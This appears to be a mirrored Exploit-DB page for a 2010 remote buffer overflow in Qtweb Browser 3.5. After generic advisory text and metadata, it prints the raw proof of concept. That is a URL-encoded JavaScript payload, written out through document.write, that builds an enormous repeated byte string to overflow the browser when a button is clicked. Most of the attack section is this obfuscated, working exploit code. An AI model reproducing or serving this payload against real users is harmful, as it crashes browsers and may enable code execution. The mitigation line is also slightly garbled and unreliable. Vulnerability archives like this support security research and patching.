header-logo
Suggest Exploit
vendor:
Qtweb Browser
by:
PoisonCode
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Qtweb Browser
Affected Version From: 3.5
Affected Version To: 3.5
Patch Exists: YES
Related CWE: N/A
CPE: a:qtweb_browser:qtweb_browser:3.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

Remote Buffer Overflow Qtweb Browser 3.5

A remote buffer overflow vulnerability exists in Qtweb Browser 3.5. By sending a specially crafted request, an attacker can cause a buffer overflow, resulting in a denial of service or the execution of arbitrary code. The vulnerability is due to insufficient bounds checking when processing a maliciously crafted request. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of Qtweb Browser 3.5 or later.
Source

Exploit-DB raw data:

# Title: Remote Buffer Overflow Qtweb Browser 3.5
# Software:http://www.qtweb.net/downloads/QtWeb-setup.exe
# Portable Software:http://www.qtweb.net/downloads/QtWeb.exe
# Version: 3.5
# Tested on: Windows
# Author: PoisonCode
# Published: 2010-11-10
# CVE-ID:()
 
_____    _____                      _ _        
|  __ \ / ____|                    (_) |       
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/
Anti Lammer Encode

<Script Language='Javascript'>
<!--
document.write(unescape('%3C%64%69%76%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%6D%67%31%35%32%2E%69%6D%61%67%65%73%68%61%63%6B%2E%75%73%2F%69%6D%67%31%35%32%2F%33%30%32%30%2F%63%6F%70%69%61%64%65%70%73%63%75%73%74%6F%6D%2E%6A%70%67%22%3E%3C%2F%64%69%76%3E%0A%3C%73%63%72%69%70%74%3E%0A%66%75%6E%63%74%69%6F%6E%20%62%6C%6F%63%6B%28%29%20%7B%0A%76%61%72%20%62%20%3D%20%27%5C%78%34%43%5C%78%45%46%5C%78%31%33%5C%78%30%30%5C%78%30%30%5C%78%31%62%5C%78%38%64%5C%78%64%34%27%3B%0A%66%6F%72%20%28%61%20%3D%30%3B%61%3C%31%33%33%37%3B%61%2B%2B%29%20%7B%0A%62%2B%3D%62%2B%27%5C%78%34%43%5C%78%45%46%5C%78%31%33%5C%78%30%30%5C%78%30%30%5C%78%31%62%5C%78%38%64%5C%78%64%34%27%3B%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%68%74%6D%6C%3E%3C%6D%61%72%71%75%65%65%3E%3C%68%31%3E%27%2B%62%2B%62%29%3B%0A%7D%0A%7D%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%3C%62%6F%64%79%20%62%67%63%6F%6C%6F%72%3D%22%23%30%30%30%30%30%30%30%22%3E%0A%3C%64%69%76%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%3C%70%3E%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%62%75%74%74%6F%6E%22%20%6E%61%6D%65%3D%22%53%75%62%6D%69%74%22%20%76%61%6C%75%65%3D%22%45%6A%65%63%75%74%61%72%20%42%75%66%66%65%72%20%4F%76%65%72%66%6C%6F%77%22%20%20%6F%6E%63%6C%69%63%6B%3D%22%62%6C%6F%63%6B%28%29%22%2F%3E%3C%2F%70%3E%3C%2F%64%69%76%3E%20%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E'));
//-->
</Script>

Navigation

Suggest Exploit

Services By CQR